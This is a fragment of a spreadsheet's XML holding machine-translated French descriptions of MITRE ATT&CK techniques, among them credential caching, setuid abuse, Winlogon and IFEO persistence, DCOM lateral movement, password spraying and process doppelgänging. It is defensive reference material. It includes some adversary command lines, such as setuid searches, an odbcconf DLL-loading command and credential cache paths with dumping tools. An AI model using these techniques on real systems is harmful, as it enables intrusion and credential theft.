* CredSSP : Fournit l’authentification SSO et l’authentification au niveau du réseau pour les services de bureau à distance. (Citation : Protection des informations d’identification des blogs TechNet)
https://attack.mitre.org/techniques/T1003/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter des balayages de reconnaissance actifs pour recueillir des informations qui peuvent être utilisées pendant le ciblage. Les analyses actives sont celles où l’adversaire sonde l’infrastructure de la victime via le trafic réseau, par opposition à d’autres formes de reconnaissance qui n’impliquent pas d’interaction directe.
Les adversaires peuvent effectuer différentes formes d’analyse active en fonction des informations qu’ils cherchent à recueillir. Ces analyses peuvent également être effectuées de différentes manières, notamment à l’aide de fonctionnalités natives de protocoles réseau tels que ICMP. (Citation : Botnet Scan)(Citation : Prise d’empreintes digitales OWASP)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[Externe à distance Services](https://attack.mitre.org/techniques/T1133) ou [Exploiter l’application publique](https://attack.mitre.org/techniques/T1190)).
https://attack.mitre.org/techniques/T1595</t>
  </si>
  <si>
    <t>Les adversaires peuvent contourner les mécanismes conçus pour contrôler les privilèges d’élévation afin d’obtenir des autorisations de niveau supérieur. La plupart des systèmes modernes contiennent des mécanismes natifs de contrôle d’élévation qui sont destinés à limiter les privilèges qu’un utilisateur peut effectuer sur une machine. L’autorisation doit être accordée à des utilisateurs spécifiques afin d’effectuer des tâches qui peuvent être considérées comme présentant un risque plus élevé. (Citation : TechNet Comment fonctionne l’UAC)(Citation : sudo man page 2018) Un adversaire peut utiliser plusieurs méthodes pour tirer parti des mécanismes de contrôle intégrés afin d’élever les privilèges sur un système. (Citation : logiciel malveillant OSX Keydnap)(Citation : Fortinet Fareit)
https://attack.mitre.org/techniques/T1548</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer un nouveau processus avec un jeton existant pour élever les privilèges et contourner les contrôles d’accès. Les processus peuvent être créés avec le jeton et le contexte de sécurité résultant d’un autre utilisateur à l’aide de fonctionnalités telles que &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; et &lt;code&gt;runas&lt;/code&gt;. (Citation : Microsoft RunAs)
La création de processus avec un jeton non associé à l’utilisateur actuel peut nécessiter les informations d’identification de l’utilisateur cible, des privilèges spécifiques pour emprunter l’identité de cet utilisateur ou l’accès au jeton à utiliser. Par exemple, le jeton peut être dupliqué via [Usurpation d’identité/Vol de jeton](https://attack.mitre.org/techniques/T1134/001) ou créé via [Créer et emprunter l’identité d’un jeton](https://attack.mitre.org/techniques/T1134/003) avant d’être utilisé pour créer un processus.
Bien que cette technique soit distincte de l'[Usurpation d’identité/Vol de jeton](https://attack.mitre.org/techniques/T1134/001), les techniques peuvent être utilisées conjointement lorsqu’un jeton est dupliqué, puis utilisé pour créer un nouveau processus.
https://attack.mitre.org/techniques/T1134/002</t>
  </si>
  <si>
    <t>Un adversaire peut abuser des configurations où une application a les bits setuid ou setgid définis afin d’exécuter le code dans le contexte d’un utilisateur différent (et peut-être plus privilégié). Sous Linux ou macOS, lorsque les bits setuid ou setgid sont définis pour un binaire d’application, l’application s’exécute avec les privilèges de l’utilisateur ou du groupe propriétaire respectivement. (Citation : page de manuel setuid) Normalement, une application est exécutée dans le contexte de l’utilisateur actuel, quel que soit l’utilisateur ou le groupe qui possède l’application. Toutefois, dans certains cas, les programmes doivent être exécutés dans un contexte élevé pour fonctionner correctement, mais l’utilisateur qui les exécute ne dispose peut-être pas des privilèges spécifiques requis.
Au lieu de créer une entrée dans le fichier sudoers, ce qui doit être fait par root, n’importe quel utilisateur peut spécifier l’indicateur setuid ou setgid à définir pour ses propres applications (c’est-à-dire [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). La commande &lt;code&gt;chmod&lt;/code&gt; peut définir ces bits avec le bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; ou via un nommage abrégé, &lt;code&gt;chmod u+s [file]&lt;/code&gt;. Cela activera le bit setuid. Pour activer le bit setgid, &lt;code&gt;chmod 2775&lt;/code&gt; et &lt;code&gt;chmod g+s&lt;/code&gt; peuvent être utilisés.
Les adversaires peuvent utiliser ce mécanisme sur leurs propres logiciels malveillants pour s’assurer qu’ils sont en mesure de s’exécuter dans des contextes élevés à l’avenir. (Citation : logiciel malveillant OSX Keydnap) Cet abus fait souvent partie d’une « évasion de shell » ou d’autres actions visant à contourner un environnement d’exécution avec des autorisations restreintes.
Alternativement, les adversaires peuvent choisir de trouver et de cibler des binaires vulnérables avec les bits setuid ou setgid déjà activés (c’est-à-dire [Découverte de fichiers et de répertoires](https://attack.mitre.org/techniques/T1083)). Les bits setuid et setguid sont indiqués par un « s » au lieu d’un « x » lors de l’affichage des attributs d’un fichier via &lt;code&gt;ls -l&lt;/code&gt;. La commande &lt;code&gt;find&lt;/code&gt; peut également être utilisée pour rechercher de tels fichiers. Par exemple, &lt;code&gt;find / -perm +4000 2&gt;/dev/null&lt;/code&gt; peut être utilisé pour trouver des fichiers avec setuid défini et &lt;code&gt;find / -perm +2000 2&gt;/dev/null&lt;/code&gt; peut être utilisé pour setgid. Les binaires qui ont ces bits définis peuvent alors être abusés par des adversaires. (Citation : go awayBins Suid)
https://attack.mitre.org/techniques/T1548/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des fonctionnalités de Winlogon pour exécuter des DLL et/ou des exécutables lorsqu’un utilisateur se connecte. Winlogon.exe s’agit d’un composant Windows responsable des actions à l’ouverture de session/déconnexion ainsi que de la séquence d’attention sécurisée (SAS) déclenchée par Ctrl-Alt-Suppr. Les entrées de registre dans &lt;code&gt;HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\&lt;/code&gt; et &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt; sont utilisées pour gérer des programmes d’assistance et des fonctionnalités supplémentaires qui prennent en charge Winlogon. (Citation : Cylance Reg Persistence septembre 2013) 
Les modifications malveillantes apportées à ces clés de registre peuvent entraîner le chargement et l’exécution par Winlogon de DLL et/ou d’exécutables malveillants. Plus précisément, les sous-clés suivantes sont connues pour être potentiellement vulnérables aux abus : (Citation : Cylance Reg Persistence Septembre 2013)
* Winlogon\Notify - pointe vers les DLL du package de notification qui gèrent les événements Winlogon
* Winlogon\Userinit - pointe vers userinit.exe, le programme d’initialisation de l’utilisateur exécuté lorsqu’un utilisateur se connecte
* Winlogon\Shell - pointe vers explorer.exe, le shell système exécuté lorsqu’un utilisateur se connecte
Les adversaires peuvent tirer parti de ces fonctionnalités pour exécuter à plusieurs reprises du code malveillant et établir une persistance.
https://attack.mitre.org/techniques/T1547/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des [comptes valides](https://attack.mitre.org/techniques/T1078) pour interagir avec des machines distantes en tirant parti du modèle DCOM (Distributed Component Object Model). L’adversaire peut alors effectuer des actions en tant qu’utilisateur connecté.
Le modèle COM (Windows Component Object Model) est un composant de l’interface de programmation d’application (API) native de Windows qui permet l’interaction entre des objets logiciels ou du code exécutable qui implémente une ou plusieurs interfaces. Par COM, un objet client peut appeler des méthodes d’objets serveur, qui sont généralement des bibliothèques de liens dynamiques (DLL) ou des exécutables (EXE). Distributed COM (DCOM) est un middleware transparent qui étend les fonctionnalités de COM au-delà d’un ordinateur local à l’aide de la technologie d’appel de procédure distante (RPC). (Référence : Fireeye Hunting COM juin 2019)(Citation : Microsoft COM)
Les autorisations d’interaction avec les objets COM du serveur local et distant sont spécifiées par les listes de contrôle d’accès (ACL) dans le registre. (Citation : Clés Com à l’échelle du processus Microsoft) Par défaut, seuls les administrateurs peuvent activer et lancer à distance des objets COM via DCOM. (Référence : Microsoft COM ACL)
Grâce à DCOM, les adversaires opérant dans le contexte d’un utilisateur disposant de privilèges appropriés peuvent obtenir à distance l’exécution arbitraire et même directe de shellcode via des applications Office (Citation : Enigma Outlook DCOM Lateral Movement Nov 2017) ainsi que d’autres objets Windows contenant des méthodes non sécurisées. (Citation : Enigma MMC20 COM janvier 2017)(Citation : Enigma DCOM Lateral Movement Jan 2017) DCOM peut également exécuter des macros dans des documents existants (Citation : Enigma Excel DCOM Sept 2017) et peut également appeler l’exécution [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) directement via une instance créée par COM d’une application Microsoft Office (Citation : Cyberreason DCOM DDE Lateral Movement Nov 2017), en contournant le besoin d’un document malveillant. DCOM peut être utilisé comme méthode d’interaction à distance avec [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Référence : MSDN WMI)
https://attack.mitre.org/techniques/T1021/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser une seule ou une petite liste de mots de passe couramment utilisés sur de nombreux comptes différents pour tenter d’obtenir des informations d’identification de compte valides. La pulvérisation de mots de passe utilise un seul mot de passe (par exemple « Password01 »), ou une petite liste de mots de passe couramment utilisés, qui peuvent correspondre à la politique de complexité du domaine. Les connexions sont tentées avec ce mot de passe sur de nombreux comptes différents sur un réseau afin d’éviter les verrouillages de compte qui se produiraient normalement lors de la force brute d’un seul compte avec plusieurs mots de passe. (Citation : Pulvérisation de mots de passe BlackHillsInfosec)
En règle générale, les services de gestion sur les ports couramment utilisés sont utilisés lors de la pulvérisation de mots de passe.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Dans les environnements par défaut, les tentatives de connexion LDAP et Kerberos sont moins susceptibles de déclencher des événements via SMB, ce qui crée l’événement d'« échec de connexion » Windows ID 4625.
https://attack.mitre.org/techniques/T1110/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un proxy externe pour servir d’intermédiaire pour les communications réseau vers un serveur de commande et de contrôle afin d’éviter les connexions directes à leur infrastructure. Il existe de nombreux outils qui permettent la redirection du trafic via des proxys ou la redirection de port, notamment [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy et ZXPortMap. (Citation : Outils d’attaque APT de Trend Micro) Les adversaires utilisent ces types de proxys pour gérer les communications de commande et de contrôle, pour assurer la résilience face à la perte de connexion ou pour contourner les voies de communication fiables existantes afin d’éviter les soupçons.
Les proxys de connexion externe sont utilisés pour masquer la destination du trafic C2 et sont généralement implémentés avec des redirecteurs de port. Les systèmes compromis en dehors de l’environnement victime peuvent être utilisés à ces fins, ainsi que l’infrastructure achetée telle que les ressources basées sur le cloud ou les serveurs privés virtuels. Les proxys peuvent être choisis en fonction de la faible probabilité qu’une connexion à ceux-ci à partir d’un système compromis soit étudiée. Les systèmes victimes communiquaient directement avec le proxy externe sur Internet, puis le proxy transmettait les communications au serveur C2.
https://attack.mitre.org/techniques/T1090/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent installer du code sur des portails externes, tels qu’une page de connexion VPN, pour capturer et transmettre les informations d’identification des utilisateurs qui tentent de se connecter au service. Par exemple, une page de connexion compromise peut enregistrer les informations d’identification fournies à l’utilisateur avant de le connecter au service.
Cette variation de la capture d’entrée peut être effectuée après la compromission en utilisant un accès administratif légitime comme mesure de sauvegarde pour maintenir l’accès au réseau via [Services à distance externes](https://attack.mitre.org/techniques/T1133) et [Comptes valides](https://attack.mitre.org/techniques/T1078) ou dans le cadre de la compromission initiale par l’exploitation du service Web externe. (Citation : Volexity Virtual Private Keylogging)
https://attack.mitre.org/techniques/T1056/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent collecter des adresses e-mail qui peuvent être utilisées lors du ciblage. Même s’il existe des instances internes, les organisations peuvent disposer d’une infrastructure de messagerie publique et d’adresses pour les employés.
Les adversaires peuvent facilement recueillir des adresses électroniques, car elles peuvent être facilement accessibles et exposées via des ensembles de données en ligne ou d’autres ensembles de données accessibles (ex : [Médias sociaux](https://attack.mitre.org/techniques/T1593/001) ou [Sites Web appartenant à la victime de recherche](https://attack.mitre.org/techniques/T1594)). (Citation : HackersArise Email)(Citation : CNET Leaks) Les adresses e-mail peuvent également être énumérées par des moyens plus actifs (c’est-à-dire [Analyse active](https://attack.mitre.org/techniques/T1595)), tels que l’exploration et l’analyse des réponses des services d’authentification qui peuvent révéler des noms d’utilisateur valides dans un système. (Citation : GrimBlog Nom d’utilisateurEnum) Par exemple, les adversaires peuvent être en mesure d’énumérer des adresses e-mail dans des environnements Office 365 en interrogeant divers points de terminaison d’API disponibles publiquement, tels que autodiscover et GetCredentialType. (citation : GitHub Office 365 User Enumeration)(Citation : Azure Active Directory Reconnaisance)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de messagerie](https://attack.mitre.org/techniques/T1586/002))), et/ou l’accès initial (ex : [Phishing](https://attack.mitre.org/techniques/T1566) ou [Force brute]( https://attack.mitre.org/techniques/T1110) via [Services à distance externes](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1589/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des communications vocales pour obtenir des informations sensibles qui peuvent être utilisées lors du ciblage. Le spearphishing pour obtenir des informations est une tentative d’inciter les cibles à divulguer des informations, souvent des informations d’identification ou d’autres informations exploitables. Le harponnage de l’information fait souvent appel à des techniques d’ingénierie sociale, telles que se faire passer pour une source ayant une raison de collecter des informations (ex : [Usurpation d’identité](https://attack.mitre.org/techniques/T1656)) et/ou créer un sentiment d’urgence ou d’alarme pour le destinataire.
Toutes les formes d’hameçonnage sont transmises par voie électronique. Dans ce scénario, les adversaires utilisent des appels téléphoniques pour obtenir des informations sensibles de la part des victimes. Connues sous le nom de phishing vocal (ou « vishing »), ces communications peuvent être exécutées manuellement par des adversaires, des centres d’appels embauchés ou même automatisées via des appels automatisés. Les hameçonneurs vocaux peuvent usurper leur numéro de téléphone tout en se faisant passer pour une entité de confiance, telle qu’un partenaire commercial ou un membre du personnel d’assistance technique. (Citation : Arnaques téléphoniques BOA)
Les victimes peuvent également recevoir des messages d’hameçonnage qui les informent d’appeler un numéro de téléphone (« hameçonnage par rappel ») où l’adversaire tente de collecter des informations confidentielles. (Citation : hameçonnage par rappel Avertium)
Les adversaires peuvent également utiliser des informations provenant d’efforts de reconnaissance antérieurs (par exemple : [Rechercher des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Rechercher des sites Web appartenant à la victime](https://attack.mitre.org/techniques/T1594)) pour adapter les prétextes afin qu’ils soient encore plus persuasifs et crédibles pour la victime.
https://attack.mitre.org/techniques/T1598/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’accéder aux informations d’identification de domaine mises en cache utilisées pour permettre l’authentification en cas d’indisponibilité d’un contrôleur de domaine. (Citation : Microsoft - Crédits mis en cache)
Sur Windows Vista et versions ultérieures, le format de hachage est le hachage DCC2 (Domain Cached Credentials version 2), également connu sous le nom de hachage MS-Cache v2. (Citation : PassLib mscache) Le nombre d’informations d’identification mises en cache par défaut varie et peut être modifié selon le système. Ce hachage n’autorise pas les attaques de type pass-the-hash, mais nécessite à la place [Craquage de mot de passe](https://attack.mitre.org/techniques/T1110/002) pour récupérer le mot de passe en texte brut. (Citation : ired mscache)
Sur les systèmes Linux, les informations d’identification Active Directory sont accessibles via des caches gérés par des logiciels tels que System Security Services Daemon (SSSD) ou Quest Authentication Services (anciennement VAS). Les hachages d’informations d’identification mis en cache se trouvent généralement dans '/var/lib/sss/db/cache. [domain].ldb' pour SSSD ou '/var/opt/quest/vas/authcache/vas_auth.vdb' pour Quest. Les adversaires peuvent utiliser des utilitaires, tels que 'tdbdump', sur ces fichiers de base de données pour vider les hachages mis en cache et utiliser [Craquage de mot de passe](https://attack.mitre.org/techniques/T1110/002) pour obtenir le mot de passe en texte brut. (Citation : Brining MimiKatz à Unix) 
Avec l’accès SYSTEM ou sudo, les outils/utilitaires tels que [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075) et secretsdump.py pour Windows ou Linikatz pour Linux peuvent être utilisés pour extraire les informations d’identification mises en cache. (Citation : Brining MimiKatz à Unix)
Remarque : Les informations d’identification mises en cache pour Windows Vista sont dérivées à l’aide de PBKDF2. (Citation : PassLib mscache)
https://attack.mitre.org/techniques/T1003/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier le fichier &lt;code&gt;de authorized_keys&lt;/code&gt; SSH pour maintenir la persistance sur un hôte victime. Les distributions Linux et macOS utilisent couramment l’authentification basée sur les clés pour sécuriser le processus d’authentification des sessions SSH pour la gestion à distance. Le fichier &lt;code&gt;authorized_keys&lt;/code&gt; en SSH spécifie les clés SSH qui peuvent être utilisées pour se connecter au compte d’utilisateur pour lequel le fichier est configuré. Ce fichier se trouve généralement dans le répertoire personnel de l’utilisateur sous &lt;code&gt;&amp;lt;user-home&amp;gt;/.ssh/authorized_keys&lt;/code&gt;. (Citation : Clés autorisées SSH) Les utilisateurs peuvent modifier le fichier de configuration SSH du système pour modifier les directives PubkeyAuthentication et RSAAuthentication à la valeur « yes » afin de s’assurer que la clé publique et l’authentification RSA sont activées. Le fichier de configuration SSH se trouve généralement sous &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.
Les adversaires peuvent modifier les fichiers &lt;code&gt;authorized_keys&lt;/code&gt; SSH directement à l’aide de scripts ou de commandes shell pour ajouter leurs propres clés publiques fournies par l’adversaire. Dans les environnements cloud, les adversaires peuvent être en mesure de modifier le fichier authorized_keys SSH d’une machine virtuelle particulière via l’interface de ligne de commande ou l’API REST. Par exemple, à l’aide de la commande « add-metadata » de l’interface de ligne de commande Google Cloud, un adversaire peut ajouter des clés SSH à un compte utilisateur. (citation : Google Cloud Ajouter des métadonnées)(Citation : Élévation de privilèges Google Cloud) De même, dans Azure, un adversaire peut mettre à jour le fichier authorized_keys d’une machine virtuelle via une requête PATCH adressée à l’API. (Citation : Machines virtuelles de mise à jour Azure) Cela garantit qu’un adversaire possédant la clé privée correspondante peut se connecter en tant qu’utilisateur existant via SSH. (Citation : Abus de la clé SSH de Venafi)(Citation : Cybereason Linux Exim Worm) Cela peut également entraîner une élévation de privilèges lorsque la machine virtuelle ou l’instance dispose d’autorisations distinctes de celles de l’utilisateur demandeur.
Lorsque authorized_keys fichiers sont modifiés via des API cloud ou des interfaces de ligne de commande, un adversaire peut obtenir une élévation de privilèges sur la machine virtuelle cible s’il ajoute une clé à un utilisateur disposant de privilèges plus élevés. 
Les clés SSH peuvent également être ajoutées aux comptes sur les périphériques réseau, par exemple avec la commande 'ip ssh pubkey-chain' [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). (Référence : cisco_ip_ssh_pubkey_ch_cmd)
https://attack.mitre.org/techniques/T1098/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur les appliances de sécurité réseau de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les appliances de sécurité réseau peuvent inclure divers détails, tels que l’existence et les spécificités des pare-feu déployés, des filtres de contenu et des proxys/hôtes bastionnaires. Les adversaires peuvent également cibler des informations sur les systèmes de détection d’intrusion basés sur le réseau (NIDS) de la victime ou d’autres appareils liés aux opérations de cybersécurité défensives.
Les adversaires peuvent collecter ces informations de différentes manières, par exemple par le biais d’une [analyse active](https://attack.mitre.org/techniques/T1595) ou d’un [hameçonnage pour obtenir des informations](https://attack.mitre.org/techniques/T1598). (Citation : Nmap firewalls NIDS) Les informations relatives aux appliances de sécurité réseau peuvent également être exposées à des adversaires via des ensembles de données en ligne ou d’autres ensembles de données accessibles (ex : [Sites Web appartenant à des victimes de recherche](https://attack.mitre.org/techniques/T1594)). La collecte de ces informations peut révéler des possibilités pour d’autres formes de reconnaissance (ex : [Rechercher dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596) ou [Rechercher dans des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établir des ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou un accès initial (ex : [Externe à distance Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1590/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir une persistance et/ou élever des privilèges en exécutant du contenu malveillant déclenché par des débogueurs IFEO (Image File Execution Options). Les IFEO permettent à un développeur d’attacher un débogueur à une application. Lorsqu’un processus est créé, un débogueur présent dans l’IFEO d’une application est ajouté au nom de l’application, ce qui permet de lancer le nouveau processus sous le débogueur (par exemple, &lt;code&gt;C :\dbg\ntsd.exe -g notepad.exe&lt;/code&gt;). (Citation : Microsoft Dev Blog IFEO mars 2010)
Les IFEO peuvent être définis directement via le registre ou dans les Global Flags via l’outil GFlags. (Citation : Microsoft GFlags mars 2017) Les IFEO sont représentés sous forme de valeurs de &lt;code&gt;débogueur&lt;/code&gt; dans le registre sous &lt;code&gt;HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt;&lt;/code&gt; où &lt;code&gt;&amp;lt;exécutable&amp;gt;&lt;/code&gt; est le fichier binaire auquel le débogueur est attaché. (Citation : Microsoft Dev Blog IFEO mars 2010)
Les IFEO peuvent également permettre le lancement d’un programme de surveillance arbitraire lorsqu’un programme spécifié se termine silencieusement (c’est-à-dire qu’il est prématurément arrêté par lui-même ou par un second processus non en mode noyau). (Citation : Microsoft Silent Process Exit NOV 2017) (Référence : Oddvar Moe IFEO AVRIL 2018) À l’instar des débogueurs, la surveillance des sorties silencieuses peut être activée via GFlags et/ou en modifiant directement les valeurs de registre IFEO et de sortie de processus silencieux dans &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\&lt;/code&gt;. (Citation : Microsoft Silent Process Exit NOV 2017) (Référence : Oddvar Moe IFEO AVRIL 2018)
À l’instar des [Fonctionnalités d’accessibilité](https://attack.mitre.org/techniques/T1546/008), sous Windows Vista et versions ultérieures, ainsi que sur Windows Server 2008 et versions ultérieures, une clé de registre peut être modifiée pour configurer « cmd.exe » ou un autre programme qui fournit un accès par porte dérobée, en tant que « débogueur » pour un programme d’accessibilité (par exemple : utilman.exe). Une fois le registre modifié, le fait d’appuyer sur la combinaison de touches appropriée sur l’écran de connexion lorsque vous êtes au clavier ou lorsque vous êtes connecté avec [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) entraînera l’exécution du programme « débogueur » avec les privilèges SYSTEM. (Référence : Tilbury 2014)
À l’instar de [Process Injection](https://attack.mitre.org/techniques/T1055), ces valeurs peuvent également être utilisées de manière abusive pour obtenir une élévation de privilèges en provoquant le chargement et l’exécution d’un exécutable malveillant dans le contexte de processus distincts sur l’ordinateur. (Citation : Injection de processus élastique juillet 2017) L’installation de mécanismes IFEO peut également fournir une persistance via une invocation déclenchée continue.
Les logiciels malveillants peuvent également utiliser IFEO pour [Entraver les défenses](https://attack.mitre.org/techniques/T1562) en enregistrant des débogueurs invalides qui redirigent et désactivent efficacement diverses applications système et de sécurité. (Citation : FSecure Hupigon) (Référence : Symantec Ushedix, juin 2008)
https://attack.mitre.org/techniques/T1546/012</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’exécution de charges utiles malveillantes odbcconf.exe par proxy de proxy. Odbcconf.exe s’agit d’un utilitaire Windows qui vous permet de configurer les pilotes ODBC (Open Database Connectivity) et les noms de sources de données. (Référence : Microsoft odbcconf.exe) Le fichier binaire Odbcconf.exe peut être signé numériquement par Microsoft.
Les adversaires peuvent abuser de odbcconf.exe pour contourner les solutions de contrôle des applications qui ne tiennent pas compte de leur abus potentiel. Semblable à [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe dispose d’un indicateur &lt;code&gt;REGSVR&lt;/code&gt; qui peut être utilisé à mauvais escient pour exécuter des DLL (ex : &lt;code&gt;odbcconf.exe /S /A &amp;lbrace ;REGSVR « C :\Users\Public\file.dll"&amp;rbrace ;&lt;/code&gt;). (Citation : LOLBAS Odbcconf)(Citation : TrendMicro Squiblydoo août 2017)(Citation : TrendMicro Cobalt Group, novembre 2017)
https://attack.mitre.org/techniques/T1218/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser les moteurs de recherche pour collecter des informations sur les victimes qui peuvent être utilisées lors du ciblage. Les services de moteurs de recherche analysent généralement les sites en ligne pour indexer le contexte et peuvent fournir aux utilisateurs une syntaxe spécialisée pour rechercher des mots-clés spécifiques ou des types de contenu spécifiques (c’est-à-dire des types de fichiers). (Citation : SecurityTrails Google Hacking)(Citation : ExploitDB GoogleHacking)
Les adversaires peuvent élaborer diverses requêtes sur les moteurs de recherche en fonction des informations qu’ils cherchent à recueillir. Les auteurs de menace peuvent utiliser les moteurs de recherche pour recueillir des renseignements généraux sur les victimes, ainsi que des requêtes spécialisées pour rechercher des déversements ou des fuites d’informations sensibles telles que des détails sur le réseau ou des informations d’identification. Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Phishing pour obtenir des informations](https://attack.mitre.org/techniques/T1598) ou [Recherche dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)), la mise en place de ressources opérationnelles (ex : [Établissement de comptes](https://attack.mitre.org/techniques/T1585) ou [Compromission de comptes](https://attack.mitre.org/techniques/T1586)), et/ou l’accès initial (ex : [Valide Comptes](https://attack.mitre.org/techniques/T1078) ou [Hameçonnage](https://attack.mitre.org/techniques/T1566)).
https://attack.mitre.org/techniques/T1593/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur les relations d’affaires de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les relations d’affaires d’une organisation peuvent inclure une variété de détails, y compris des organisations/domaines de deuxième partie ou de tiers (par exemple, des fournisseurs de services gérés, des entrepreneurs, etc.) qui ont un accès au réseau connecté (et potentiellement élevé). Ces informations peuvent également révéler les chaînes d’approvisionnement et les voies d’expédition des ressources matérielles et logicielles de la victime.
Les adversaires peuvent recueillir ces informations de différentes manières, par exemple par le biais de l’hameçonnage par le biais de [Phishing for Information](https://attack.mitre.org/techniques/T1598). Les informations sur les relations d’affaires peuvent également être exposées à des adversaires par le biais d’informations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 de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établissement de ressources opérationnelles (ex : [Établir des comptes](https://attack.mitre.org/techniques/T1585) ou [Compromettre des comptes](https://attack.mitre.org/techniques/T1586)), et/ou d’accès initial (ex : [Chaîne d’approvisionnement Compromis](https://attack.mitre.org/techniques/T1195), [Compromission intempestive](https://attack.mitre.org/techniques/T1189) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1591/002</t>
  </si>
  <si>
    <t>Un adversaire peut exploiter les périphériques d’un ordinateur (par exemple, des caméras intégrées ou des webcams) ou des applications (par exemple, des services d’appel vidéo) pour capturer des enregistrements vidéo dans le but de recueillir des informations. Des images peuvent également être capturées à partir d’appareils ou d’applications, éventuellement à des intervalles spécifiés, à la place des fichiers vidéo.
Des logiciels malveillants ou des scripts peuvent être utilisés pour interagir avec les appareils par le biais d’une API disponible fournie par le système d’exploitation ou d’une application pour capturer des vidéos ou des images. Les fichiers vidéo ou image peuvent être écrits sur le disque et exfiltrés ultérieurement. Cette technique diffère de la [Capture d’écran](https://attack.mitre.org/techniques/T1113) en raison de l’utilisation d’appareils ou d’applications spécifiques pour l’enregistrement vidéo plutôt que pour la capture de l’écran de la victime.
Dans macOS, il existe différents échantillons de logiciels malveillants qui enregistrent la webcam de l’utilisateur, tels que FruitFly et Proton. (Citation : objectif-voir revue 2017)
https://attack.mitre.org/techniques/T1125</t>
  </si>
  <si>
    <t>Les adversaires peuvent injecter du code malveillant dans le processus via le doppelgänging de processus afin d’échapper aux défenses basées sur les processus et éventuellement d’élever les privilèges. Le doppelgänging de processus est une méthode d’exécution de code arbitraire dans l’espace d’adressage d’un processus actif distinct. 
Windows Transactional NTFS (TxF) a été introduit dans Vista en tant que méthode pour effectuer des opérations de fichiers sécurisées. (Citation : Microsoft TxF) Pour garantir l’intégrité des données, TxF n’autorise qu’un seul handle transactionnel à écrire dans un fichier à un moment donné. Jusqu’à ce que la transaction de descripteur d’écriture soit terminée, tous les autres descripteurs sont isolés de l’enregistreur et ne peuvent lire que la version validée du fichier qui existait au moment de l’ouverture du descripteur. (Citation : Concepts de base de Microsoft TxF) Pour éviter la corruption, TxF effectue une restauration automatique si le système ou l’application échoue lors d’une transaction d’écriture. (Citation : Microsoft Où utiliser TxF)
Bien qu’elle soit obsolète, l’interface de programmation d’application (API) TxF est toujours activée à partir de Windows 10. (Citation : BlackHat Process Doppelgänging décembre 2017)
Les adversaires peuvent abuser de TxF pour effectuer une variante sans fichier de [Injection de processus](https://attack.mitre.org/techniques/T1055). À l’instar du [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), le doppelgänging de processus consiste à remplacer la mémoire d’un processus légitime, permettant l’exécution voilée d’un code malveillant susceptible d’échapper aux défenses et à la détection. L’utilisation de TxF par Process Doppelgänging évite également l’utilisation de fonctions API hautement surveillées telles que &lt;code&gt;NtUnmapViewOfSection&lt;/code&gt;, &lt;code&gt;VirtualProtectEx&lt;/code&gt; et &lt;code&gt;SetThreadContext&lt;/code&gt;. (Citation : BlackHat Process Doppelgänging décembre 2017)
Le processus Doppelgänging est mis en œuvre en 4 étapes (Citation : BlackHat Process Doppelgänging Dec 2017) :
* Transaction – Créez une transaction TxF à l’aide d’un exécutable légitime, puis écrasez le fichier avec un code malveillant. Ces modifications seront isolées et ne seront visibles que dans le contexte de la transaction.
* Charger – Créez une section partagée de la mémoire et chargez l’exécutable malveillant.
* Rollback – Annulez les modifications apportées à l’exécutable d’origine, supprimant ainsi le code malveillant du système de fichiers.
* Animer – Créez un processus à partir de la section corrompue de la mémoire et lancez l’exécution.
Ce comportement n’entraînera probablement pas de privilèges élevés, car le processus injecté a été généré à partir du processus d’injection (et hérite donc du contexte de sécurité). Cependant, l’exécution via le doppelgänging de processus peut échapper à la détection des produits de sécurité, car l’exécution est masquée par un processus légitime.
https://attack.mitre.org/techniques/T1055/013</t>
  </si>
  <si>
